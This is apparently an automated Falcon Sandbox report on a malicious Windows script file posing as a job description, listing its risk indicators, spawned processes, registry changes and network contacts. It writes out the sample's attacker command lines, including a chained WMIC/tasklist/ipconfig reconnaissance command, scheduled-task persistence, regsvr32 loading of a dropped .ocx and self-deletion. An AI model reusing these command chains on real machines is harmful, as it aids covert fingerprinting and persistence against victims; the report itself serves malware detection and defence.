Job Description.wsf
This report is generated from a file or URL submitted to this webservice on December 19th 2019 21:17:09 (UTC)
Guest System: Windows 7 32 bit, Professional, 6.1 (build 7601), Service Pack 1
Report generated by
Falcon Sandbox v8.30 © Hybrid Analysis
Incident Response
Risk Assessment
- Spyware
  - Hooks API calls
- Persistence
  - Schedules a task to be executed at a specific time and date
  - Spawns a lot of processes
- Fingerprint
  - Detected network related fingerprinting/snooping attempt
  - Queries kernel debugger information
  - Queries sensitive IE security settings
  - Reads system information using Windows Management Instrumentation Commandline (WMIC)
  - Reads the active computer name
  - Reads the cryptographic machine GUID
- Evasive
  - Marks file for deletion
- Spreading
  - Opens the MountPointManager (often used to detect additional infection locations)
- Network Behavior
  - Contacts 2 domains and 2 hosts.
MITRE ATT&CK™ Techniques Detection
Indicators
Malicious Indicators (6)

External Systems

Sample was identified as malicious by at least one Antivirus engine
- details
  - 1/59 Antivirus vendors marked sample as malicious (1% detection rate)
- source: External System
- relevance: 8/10
Installation/Persistence

Schedules a task to be executed at a specific time and date
- details
  - Process "schtasks.exe" with commandline "/Delete /F /TN "912F8A0F793""
  - Process "schtasks.exe" with commandline "/Create /TN "912F8A0F793" /XML "%ALLUSERSPROFILE%\Microsoft\1B2FFE2276368908.txt""
- source: Monitored Target
- relevance: 8/10
- ATT&CK ID: T1168
Spyware/Information Retrieval

Detected network related fingerprinting/snooping attempt
- details
  - Process "ipconfig.exe" with commandline ""
- source: Monitored Target
- relevance: 10/10
- ATT&CK ID: T1087
Unusual Characteristics

References suspicious system modules
- details
  - tasklist output (CSV, one process per line):
    "System Idle Process","0","Services","0","12 K"
    "System","4","Services","0","728 K"
    "smss.exe","264","Services","0","812 K"
    "csrss.exe","340","Services","0","3 376 K"
    "csrss.exe","388","Console","1","7 988 K"
    "wininit.exe","396","Services","0","3 296 K"
    "winlogon.exe","436","Console","1","5 380 K"
    "services.exe","484","Services","0","6 932 K"
    "lsass.exe","492","Services","0","8 540 K"
    "lsm.exe","500","Services","0","3 044 K"
    "svchost.exe","604","Services","0","6 908 K"
    "svchost.exe","728","Services","0","6 464 K"
    "svchost.exe","812","Services","0","17 320 K"
    "svchost.exe","852","Services","0","10 452 K"
    "svchost.exe","876","Services","0","13 784 K"
    "svchost.exe","928","Services","0","22 552 K"
    "svchost.exe","1152","Services","0","11 436 K"
    "spoolsv.exe","1288","Services","0","8 872 K"
    "svchost.exe","1320","Services","0","12 144 K"
    "taskhost.exe","1496","Console","1","22 384 K"
    "dwm.exe","1640","Console","1","4 936 K"
    "svchost.exe","996","Services","0","4 676 K"
    "svchost.exe","2220","Services","0","9 604 K"
    "svchost.exe","2352","Services","0","6 332 K"
    "WmiPrvSE.exe","2704","Services","0","4 956 K"
    "WmiPrvSE.exe","3220","Services","0","9 972 K"
    "explorer.exe","2552","Console","1","31 104 K"
    "conhost.exe","3884","Console","1","3 724 K"
    "conhost.exe","3400","Console","1","3 704 K"
    "conhost.exe","3868","Console","1","3 712 K"
    "WINWORD.EXE","3104","Console","1","60 316 K"
    "svchost.exe","1700","Services","0","2 020 K"
    "msiexec.exe","1924","Services","0","12 024 K"
    "OSPPSVC.EXE","2264","Services","0","132 K"
    "msxsl.exe","2028","Console","1","33 480 K"
    "conhost.exe","1392","Console","1","3 760 K"
    "cmd.exe","172","Console","1","2 576 K"
    "conhost.exe","3572","Console","1","3 768 K"
    "OSPPSVC.EXE","3752","Services","0","132 K"
    "dllhost.exe","2184","Services","0","3 436 K"
    "tasklist.exe","3588","Console","1","4 356 K"
  - "csrss.exe","340","Services","0","3 376 K"
  - "csrss.exe","388","Console","1","7 988 K"
  - "lsass.exe","492","Services","0","8 540 K"
- source: File/Memory
- relevance: 5/10
- ATT&CK ID: T1215

Script connects to a host without prior DNS lookup
- details
  - Process "wscript.exe" connected to "205.185.216.10" (Port: 49310, Protocol: TCP) without a DNS lookup
  - Process "wscript.exe" connected to "151.139.128.14" (Port: 49311, Protocol: TCP) without a DNS lookup
- source: Monitored Target
- relevance: 10/10

Spawns a lot of processes
- details
  - Spawned process "wscript.exe" with commandline ""C:\JobDescription.wsf""
  - Spawned process "WINWORD.EXE" with commandline ""%APPDATA%\Microsoft\21152.doc""
  - Spawned process "regsvr32.exe" with commandline "/s /i "%APPDATA%\Microsoft\40070.ocx""
  - Spawned process "schtasks.exe" with commandline "/Delete /F /TN "912F8A0F793""
  - Spawned process "schtasks.exe" with commandline "/Create /TN "912F8A0F793" /XML "%ALLUSERSPROFILE%\Microsoft\1B2FFE2276368908.txt""
  - Spawned process "msxsl.exe" with commandline "8CDAF1CED822.txt 8CDAF1CED822.txt"
  - Spawned process "cmd.exe" with commandline "/c del "%APPDATA%\Microsoft\40070.ocx" >> NUL"
  - Spawned process "cmd.exe" with commandline "/c wmic path win32_Operatingsystem get SerialNumber /FORMAT:Textvaluelist | findstr /R /C:"SerialNumber=" > "%TEMP%\55356.txt" & vol C: > "%TEMP%\8785.txt" & wmic csproduct get Name /FORMAT:Textvaluelist | findstr /R /C:"Name=" > "%TEMP%\23030.txt" & tasklist /FO CSV /NH > "%TEMP%\4254.txt" & ver > "%TEMP%\24760.txt" & wmic os get ProductType /FORMAT:Textvaluelist | findstr /R /C:"ProductType=" > "%TEMP%\1931.txt" & ipconfig | findstr /R /C:"IPv4 Address" > "%TEMP%\16406.txt""
  - Spawned process "WMIC.exe" with commandline "wmic path win32_Operatingsystem get SerialNumber /FORMAT:Textvaluelist"
  - Spawned process "findstr.exe" with commandline "findstr /R /C:"SerialNumber=""
  - Spawned process "WMIC.exe" with commandline "wmic csproduct get Name /FORMAT:Textvaluelist"
  - Spawned process "findstr.exe" with commandline "findstr /R /C:"Name=""
  - Spawned process "tasklist.exe" with commandline "tasklist /FO CSV /NH"
  - Spawned process "WMIC.exe" with commandline "wmic os get ProductType /FORMAT:Textvaluelist"
  - Spawned process "findstr.exe" with commandline "findstr /R /C:"ProductType=""
  - Spawned process "ipconfig.exe"
  - Spawned process "findstr.exe" with commandline "findstr /R /C:"IPv4 Address""
- source: Monitored Target
- relevance: 8/10
Suspicious Indicators (23)

Anti-Detection/Stealthiness

Queries kernel debugger information
- details
  - "WINWORD.EXE" at 00022568-00003104-00000105-34039744857
  - "msxsl.exe" at 00031242-00002028-00000105-321099927823
  - "WMIC.exe" at 00031840-00003556-00000105-335215049603
  - "WMIC.exe" at 00032177-00003316-00000105-346239207505
  - "tasklist.exe" at 00032512-00003588-00000105-337547491084
  - "WMIC.exe" at 00032610-00001140-00000105-359848251776
- source: API Call
- relevance: 6/10
Environment Awareness

Queries the installation properties of user installed products
- details
  - "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INSTALLER\USERDATA\S-1-5-18\PRODUCTS\00004119210000000000000000F01FEC\INSTALLPROPERTIES")
  - "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INSTALLER\USERDATA\S-1-5-18\PRODUCTS\00004119210000000000000000F01FEC\INSTALLPROPERTIES"; Key: "WINDOWSINSTALLER"; Value: "00000000040000000400000001000000")
- source: Registry Access
- relevance: 10/10

Reads the active computer name
- details
  - "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
  - "schtasks.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
  - "msxsl.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
  - "WMIC.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
  - "tasklist.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
  - "ipconfig.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
- source: Registry Access
- relevance: 5/10
- ATT&CK ID: T1012

Reads the cryptographic machine GUID
- details
  - "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
  - "msxsl.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
  - "WMIC.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
  - "tasklist.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
- source: Registry Access
- relevance: 10/10
- ATT&CK ID: T1012
External Systems

Found an IP/URL artifact that was identified as malicious by at least one reputation engine
- details
  - 1/72 reputation engines marked "http://crt.sectigo.com" as malicious (1% detection rate)
- source: External System
- relevance: 10/10
General

Opened the service control manager
- details
  - "wscript.exe" called "OpenSCManager" requesting access rights "SC_MANAGER_CONNECT" (0x1)
  - "wscript.exe" called "OpenSCManager" requesting access rights "0XE0000000L"
  - "WINWORD.EXE" called "OpenSCManager" requesting access rights "SC_MANAGER_CONNECT" (0x1)
- source: API Call
- relevance: 10/10
- ATT&CK ID: T1035

Removes Office resiliency keys (often used to avoid problems opening documents)
- details
  - "WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "+<L")
  - "WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: ",.M")
  - "WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: ")7L")
  - "WINWORD.EXE" (Access type: "DELETE"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS")
- source: Registry Access
- relevance: 10/10
- ATT&CK ID: T1112
Installation/Persistence

Allocates virtual memory in a remote process
- details
  - "wscript.exe" allocated memory in "\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap"
  - "regsvr32.exe" allocated memory in "%ALLUSERSPROFILE%\Microsoft\msxsl.exe"
- source: API Call
- relevance: 7/10
- ATT&CK ID: T1055

Writes data to a remote process
- details
  - "wscript.exe" wrote 4 bytes to a remote process "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" (Handle: 1320)
  - "wscript.exe" wrote 32 bytes to a remote process "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" (Handle: 1320)
  - "wscript.exe" wrote 52 bytes to a remote process "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" (Handle: 1320)
  - "wscript.exe" wrote 4 bytes to a remote process "C:\Windows\System32\regsvr32.exe" (Handle: 1328)
  - "wscript.exe" wrote 1500 bytes to a remote process "C:\Windows\System32\regsvr32.exe" (Handle: 1328)
  - "wscript.exe" wrote 32 bytes to a remote process "C:\Windows\System32\regsvr32.exe" (Handle: 1328)
  - "wscript.exe" wrote 52 bytes to a remote process "C:\Windows\System32\regsvr32.exe" (Handle: 1328)
  - "regsvr32.exe" wrote 32 bytes to a remote process "C:\Windows\System32\schtasks.exe" (Handle: 288)
  - "regsvr32.exe" wrote 52 bytes to a remote process "C:\Windows\System32\schtasks.exe" (Handle: 288)
  - "regsvr32.exe" wrote 4 bytes to a remote process "C:\Windows\System32\schtasks.exe" (Handle: 288)
  - "regsvr32.exe" wrote 32 bytes to a remote process "C:\Windows\System32\schtasks.exe" (Handle: 292)
  - "regsvr32.exe" wrote 52 bytes to a remote process "C:\Windows\System32\schtasks.exe" (Handle: 292)
  - "regsvr32.exe" wrote 4 bytes to a remote process "C:\Windows\System32\schtasks.exe" (Handle: 292)
  - "regsvr32.exe" wrote 32 bytes to a remote process "%ALLUSERSPROFILE%\Microsoft\msxsl.exe" (Handle: 288)
  - "regsvr32.exe" wrote 52 bytes to a remote process "C:\ProgramData\Microsoft\msxsl.exe" (Handle: 288)
  - "regsvr32.exe" wrote 4 bytes to a remote process "C:\ProgramData\Microsoft\msxsl.exe" (Handle: 288)
  - "cmd.exe" wrote 52 bytes to a remote process "C:\Windows\System32\findstr.exe" (Handle: 100)
  - "cmd.exe" wrote 4 bytes to a remote process "C:\Windows\System32\findstr.exe" (Handle: 100)
  - "cmd.exe" wrote 32 bytes to a remote process "C:\Windows\System32\wbem\WMIC.exe" (Handle: 80)
  - "cmd.exe" wrote 52 bytes to a remote process "C:\Windows\System32\wbem\WMIC.exe" (Handle: 80)
  - "cmd.exe" wrote 4 bytes to a remote process "C:\Windows\System32\wbem\WMIC.exe" (Handle: 80)
  - "cmd.exe" wrote 32 bytes to a remote process "C:\Windows\System32\findstr.exe" (Handle: 108)
  - "cmd.exe" wrote 52 bytes to a remote process "C:\Windows\System32\findstr.exe" (Handle: 108)
  - "cmd.exe" wrote 32 bytes to a remote process "C:\Windows\System32\wbem\WMIC.exe" (Handle: 92)
  - "cmd.exe" wrote 52 bytes to a remote process "C:\Windows\System32\wbem\WMIC.exe" (Handle: 92)
  - "cmd.exe" wrote 4 bytes to a remote process "C:\Windows\System32\wbem\WMIC.exe" (Handle: 92)
  - "cmd.exe" wrote 32 bytes to a remote process "C:\Windows\System32\findstr.exe" (Handle: 100)
  - "cmd.exe" wrote 4 bytes to a remote process "C:\Windows\System32\findstr.exe" (Handle: 108)
  - "cmd.exe" wrote 32 bytes to a remote process "C:\Windows\System32\ipconfig.exe" (Handle: 108)
  - "cmd.exe" wrote 32 bytes to a remote process "C:\Windows\System32\tasklist.exe" (Handle: 88)
  - "cmd.exe" wrote 52 bytes to a remote process "C:\Windows\System32\tasklist.exe" (Handle: 88)
  - "cmd.exe" wrote 4 bytes to a remote process "C:\Windows\System32\tasklist.exe" (Handle: 88)
  - "cmd.exe" wrote 32 bytes to a remote process "C:\Windows\System32\findstr.exe" (Handle: 116)
  - "cmd.exe" wrote 52 bytes to a remote process "C:\Windows\System32\findstr.exe" (Handle: 116)
  - "cmd.exe" wrote 4 bytes to a remote process "C:\Windows\System32\findstr.exe" (Handle: 116)
  - "cmd.exe" wrote 52 bytes to a remote process "C:\Windows\System32\ipconfig.exe" (Handle: 108)
  - "cmd.exe" wrote 4 bytes to a remote process "C:\Windows\System32\ipconfig.exe" (Handle: 108)
  - "cmd.exe" wrote 32 bytes to a remote process "C:\Windows\System32\findstr.exe" (Handle: 84)
  - "cmd.exe" wrote 52 bytes to a remote process "C:\Windows\System32\findstr.exe" (Handle: 84)
  - "cmd.exe" wrote 4 bytes to a remote process "C:\Windows\System32\findstr.exe" (Handle: 84)
- source: API Call
- relevance: 6/10
- ATT&CK ID: T1055
Network Related

Sends traffic on typical HTTP outbound port, but without HTTP header
- details
  - TCP traffic to 18.222.173.108 on port 443 is sent without HTTP header
  - TCP traffic to 91.199.212.52 on port 80 is sent without HTTP header
- source: Network Traffic
- relevance: 5/10
Spyware/Information Retrieval

Reads system information using Windows Management Instrumentation Commandline (WMIC)
- details
  - Process "WMIC.exe" with commandline "wmic path win32_Operatingsystem get SerialNumber /FORMAT:Textvaluelist"
  - Process "WMIC.exe" with commandline "wmic csproduct get Name /FORMAT:Textvaluelist"
  - Process "WMIC.exe" with commandline "wmic os get ProductType /FORMAT:Textvaluelist"
- source: Monitored Target
- relevance: 3/10
- ATT&CK ID: T1047
System Destruction

Marks file for deletion
- details
  - "%PROGRAMFILES%\MICROS~3\Office14\WINWORD.EXE" marked "%APPDATA%\Microsoft\Office\Recent\21152.LNK" for deletion
  - "%ALLUSERSPROFILE%\Microsoft\msxsl.exe" marked "%TEMP%\55356.txt" for deletion
  - "%ALLUSERSPROFILE%\Microsoft\msxsl.exe" marked "C:\Users\%USERNAME%\AppData\Local\Temp\8785.txt" for deletion
  - "%ALLUSERSPROFILE%\Microsoft\msxsl.exe" marked "C:\Users\%USERNAME%\AppData\Local\Temp\23030.txt" for deletion
  - "%ALLUSERSPROFILE%\Microsoft\msxsl.exe" marked "C:\Users\%USERNAME%\AppData\Local\Temp\24760.txt" for deletion
  - "%ALLUSERSPROFILE%\Microsoft\msxsl.exe" marked "C:\Users\%USERNAME%\AppData\Local\Temp\1931.txt" for deletion
  - "%ALLUSERSPROFILE%\Microsoft\msxsl.exe" marked "C:\Users\%USERNAME%\AppData\Local\Temp\16406.txt" for deletion
  - "%ALLUSERSPROFILE%\Microsoft\msxsl.exe" marked "C:\Users\%USERNAME%\AppData\Local\Temp\4254.txt" for deletion
- source: API Call
- relevance: 10/10
- ATT&CK ID: T1107

Opens file with deletion access rights
- details
  - "WINWORD.EXE" opened "%APPDATA%\Microsoft\Office\Recent\21152.LNK" with delete access
  - "WINWORD.EXE" opened "%TEMP%\CVR6CFA.tmp" with delete access
  - "WINWORD.EXE" opened "C:\Users\%USERNAME%\AppData\Local\Microsoft\Schemas\MS Word_restart.xml" with delete access
  - "msxsl.exe" opened "C:\Users\%USERNAME%\AppData\Local\Temp\55356.txt" with delete access
  - "msxsl.exe" opened "C:\Users\%USERNAME%\AppData\Local\Temp\8785.txt" with delete access
  - "msxsl.exe" opened "C:\Users\%USERNAME%\AppData\Local\Temp\23030.txt" with delete access
  - "msxsl.exe" opened "C:\Users\%USERNAME%\AppData\Local\Temp\24760.txt" with delete access
  - "msxsl.exe" opened "C:\Users\%USERNAME%\AppData\Local\Temp\1931.txt" with delete access
  - "msxsl.exe" opened "C:\Users\%USERNAME%\AppData\Local\Temp\16406.txt" with delete access
  - "msxsl.exe" opened "C:\Users\%USERNAME%\AppData\Local\Temp\4254.txt" with delete access
- source: API Call
- relevance: 7/10
System Security

Hooks API calls
- details
  - "SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE"
  - "SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
  - "VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE"
  - "OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE"
  - "VariantClear@OLEAUT32.DLL" in "WINWORD.EXE"
- source: Hook Detection
- relevance: 10/10
- ATT&CK ID: T1179

Modifies System Certificates Settings
- details
  - "wscript.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES"; Key: "2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E")
  - "wscript.exe" (Access type: "SETVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E"; Key: "BLOB")
  - "wscript.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES"; Key: "0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43")
  - "wscript.exe" (Access type: "SETVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43"; Key: "BLOB")
  - "msxsl.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES"; Key: "2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E")
  - "msxsl.exe" (Access type: "SETVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E"; Key: "BLOB")
  - "msxsl.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES"; Key: "33E4E80807204C2B6182A3A14B591ACD25B5F0DB")
  - "msxsl.exe" (Access type: "SETVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\33E4E80807204C2B6182A3A14B591ACD25B5F0DB"; Key: "BLOB")
- source: Registry Access
- relevance: 8/10
- ATT&CK ID: T1112

Queries sensitive IE security settings
- details
  - "WINWORD.EXE" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK")
  - "msxsl.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK")
- source: Registry Access
- relevance: 8/10
- ATT&CK ID: T1012
Unusual Characteristics

Installs hooks/patches the running process
- details
  - "wscript.exe" wrote bytes "c04e767720547777e0657777b53878770000000000d09b7500000000c5ea9b750000000088ea9b7500000000e9687d7582287877ee29787700000000d2697d75000000007dbb9b750000000009be7d7500000000ba189b7500000000" to virtual address "0x77131000" (part of module "NSI.DLL")
  - "wscript.exe" wrote bytes "fae67377e1a678772e717877ee29787785e273776da0787726e47377d16d7877003d7677804b767700000000ad3715768b2d1576b641157600000000" to virtual address "0x74AC1000" (part of module "WSHTCPIP.DLL")
  - "wscript.exe" wrote bytes "e7397477e1a678772e717877ee29787785e273776da07877906477773ad57e7726e47377d16d7877003d7677804b767700000000ad3715768b2d1576b641157600000000" to virtual address "0x74FF1000" (part of module "WSHIP6.DLL")
  - "WINWORD.EXE" wrote bytes "e9848ea3ef" to virtual address "0x759BF71B" ("SetUnhandledExceptionFilter@KERNEL32.DLL")
  - "WINWORD.EXE" wrote bytes "f8110000" to virtual address "0x754C12CC" (part of module "SSPICLI.DLL")
  - "WINWORD.EXE" wrote bytes "85498fe7" to virtual address "0x666578E4" (part of module "OART.DLL")
  - "WINWORD.EXE" wrote bytes "f8114c75" to virtual address "0x754D834C" (part of module "SSPICLI.DLL")
  - "WINWORD.EXE" wrote bytes "f8110000" to virtual address "0x754C1408" (part of module "SSPICLI.DLL")
  - "WINWORD.EXE" wrote bytes "b84013fd70ffe0" to virtual address "0x754C1248" (part of module "SSPICLI.DLL")
  - "WINWORD.EXE" wrote bytes "48124c75" to virtual address "0x754D8348" (part of module "SSPICLI.DLL")
  - "WINWORD.EXE" wrote bytes "f8114c75" to virtual address "0x754D83C4" (part of module "SSPICLI.DLL")
  - "WINWORD.EXE" wrote bytes "9f28bee7" to virtual address "0x65650BA8" (part of module "MSO.DLL")
  - "WINWORD.EXE" wrote bytes "48124c75" to virtual address "0x754D83C0" (part of module "SSPICLI.DLL")
  - "WINWORD.EXE" wrote bytes "d5d99b7530c69b75e0c29b7542c69b7510c69b75acdc9b75a0df9b7536da9b7587f19b750000000091778877c09088777f6f88771ffa8877def48877f2828877857d887700000000" to virtual address "0x6FD01000" (part of module "MSIMG32.DLL")
  - "WINWORD.EXE" wrote bytes "48120000" to virtual address "0x754C139C" (part of module "SSPICLI.DLL")
  - "WINWORD.EXE" wrote bytes "48120000" to virtual address "0x754C12DC" (part of module "SSPICLI.DLL")
  - "WINWORD.EXE" wrote bytes "48124c75" to virtual address "0x754D83DC" (part of module "SSPICLI.DLL")
  - "WINWORD.EXE" wrote bytes "c04e767720547777e0657777b53878770000000000d09b7500000000c5ea9b750000000088ea9b7500000000e9687d7582287877ee29787700000000d2697d75000000007dbb9b750000000009be7d7500000000ba189b7500000000" to virtual address "0x77131000" (part of module "NSI.DLL")
  - "WINWORD.EXE" wrote bytes "43188ae7" to virtual address "0x6C24CA70" (part of module "GFX.DLL")
  - "WINWORD.EXE" wrote bytes "68130000" to virtual address "0x76151680" (part of module "WS2_32.DLL")
- source: Hook Detection
- relevance: 10/10
- ATT&CK ID: T1179

Reads information about supported languages
- details
  - "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
  - "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000401")
  - "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000040D")
  - "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000041E")
  - "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000042A")
  - "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000439")
  - "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000420")
  - "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000429")
  - "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000402")
  - "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000403")
  - "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000404")
  - "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000405")
  - "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000406")
  - "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000407")
  - "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000408")
  - "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000040A")
- source: Registry Access
- relevance: 3/10
- ATT&CK ID: T1012
5 further Suspicious Indicators are hidden (available only in the private webservice or standalone version).
Informative (37)

Anti-Detection/Stealthiness

Queries process information
- details
  - "regsvr32.exe" queried SystemProcessInformation at 00023458-00003904-00000105-296999971091
  - "regsvr32.exe" queried SystemProcessInformation at 00023458-00003904-00000105-297001254329
  - "regsvr32.exe" queried SystemProcessInformation at 00023458-00003904-00000105-298512011061
  - "regsvr32.exe" queried SystemProcessInformation at 00023458-00003904-00000105-298513398868
- source: API Call
- relevance: 4/10
- ATT&CK ID: T1057

Queries the internet cache settings (often used to hide footprints in index.dat or internet cache)
- details
  - "msxsl.exe" (Access type: "QUERYVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "DISABLECACHINGOFSSLPAGES"; Value: "00000000040000000400000000000000")
- source: Registry Access
- relevance: 3/10
- ATT&CK ID: T1012
Environment Awareness

Executes WMI queries
- details
  - "WMIC.exe" issued a query "SELECT SerialNumber FROM win32_Operatingsystem"
  - "WMIC.exe" issued a query "SELECT Name FROM Win32_ComputerSystemProduct"
  - "WMIC.exe" issued a query "SELECT ProductType FROM Win32_OperatingSystem"
- source: API Call
- relevance: 10/10
- ATT&CK ID: T1047

Executes WMI queries known to be used for VM detection
- details
  - "WMIC.exe" issued a query "SELECT Name FROM Win32_ComputerSystemProduct"
- source: API Call
- relevance: 10/10
- ATT&CK ID: T1047

Queries volume information
- details
  - "WINWORD.EXE" queries volume information of "C:\" at 00022568-00003104-0000010C-38463179726
  - "WINWORD.EXE" queries volume information of "%APPDATA%\Microsoft\21152.doc" at 00022568-00003104-0000010C-38490489432
  - "WINWORD.EXE" queries volume information of "C:\" at 00022568-00003104-0000010C-47149069228
  - "WINWORD.EXE" queries volume information of "%APPDATA%\Microsoft\21152.doc" at 00022568-00003104-0000010C-47153241500
  - "WINWORD.EXE" queries volume information of "%APPDATA%\Microsoft\UProof\CUSTOM.DIC" at 00022568-00003104-0000010C-63594602987
  - "WINWORD.EXE" queries volume information of "%APPDATA%\Microsoft\UProof\CUSTOM.DIC" at 00022568-00003104-0000010C-63595983163
- source: API Call
- relevance: 2/10
- ATT&CK ID: T1120

Queries volume information of an entire harddrive
- details
  - "WINWORD.EXE" queries volume information of "C:\" at 00022568-00003104-0000010C-38463179726
  - "WINWORD.EXE" queries volume information of "C:\" at 00022568-00003104-0000010C-47149069228
- source: API Call
- relevance: 8/10
- ATT&CK ID: T1120

Reads the registry for installed applications
- details
  - "WINWORD.EXE" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\WINWORD.EXE")
  - "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\WINWORD.EXE")
  - "msxsl.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\CMD.EXE")
  - "msxsl.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\CMD.EXE")
- source: Registry Access
- relevance: 10/10
- ATT&CK ID: T1012
General
-
Accesses Software Policy Settings
- details
-
"msxsl.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA"; Key: "")
"msxsl.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES"; Key: "")
"msxsl.exe" (Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS"; Key: "")
